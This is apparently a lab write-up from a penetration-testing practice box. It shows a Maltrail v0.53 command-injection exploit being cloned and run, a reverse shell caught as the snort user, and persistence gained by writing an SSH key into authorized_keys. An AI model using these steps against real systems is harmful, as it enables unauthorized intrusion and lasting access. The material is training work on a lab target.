RCE
The target Maltrail instance suffers from a OS command injection vulnerability
Exploit
/Practice/Ochima/3-Exploitation/attachments/{2F24B58B-026E-4292-BE97-AF8C7B637929}.png)
Found an exploit online
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ git clone https://github.com/spookier/Maltrail-v0.53-Exploit
Cloning into 'Maltrail-v0.53-Exploit'...
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 17 (delta 4), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (17/17), 4.44 KiB | 4.44 MiB/s, done.
Resolving deltas: 100% (4/4), done.Cloning the exploit repo to Kali
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ python3 Maltrail-v0.53-Exploit/exploit.py $tun0 8338 http://$IP:8338
Running exploit on http://192.168.201.32:8338/loginExecuting the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ nnc 8338
listening on [any] 8338 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.32] 55742
$ whoami
whoami
snort
$ hostname
hostname
ochima
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:f4:84 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.201.32/24 brd 192.168.201.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the snort user via exploiting the target Maltrail instance with a OS command injection vulnerability
SSH
$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/ochima]
└─$ ssh snort@$IP
The authenticity of host '192.168.201.32 (192.168.201.32)' can't be established.
ED25519 key fingerprint is SHA256:EcFUQ3abooLm3ZmBChJ1yx8VqJ5nj/Htk22+PfBdxUo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:176: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.201.32' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Apr 6 05:53:42 PM UTC 2025
System load: 0.0 Processes: 238
Usage of /: 62.2% of 9.75GB Users logged in: 0
Memory usage: 15% IPv4 address for ens160: 192.168.201.32
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
Expanded Security Maintenance for Applications is not enabled.
51 updates can be applied immediately.
30 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ SSH session established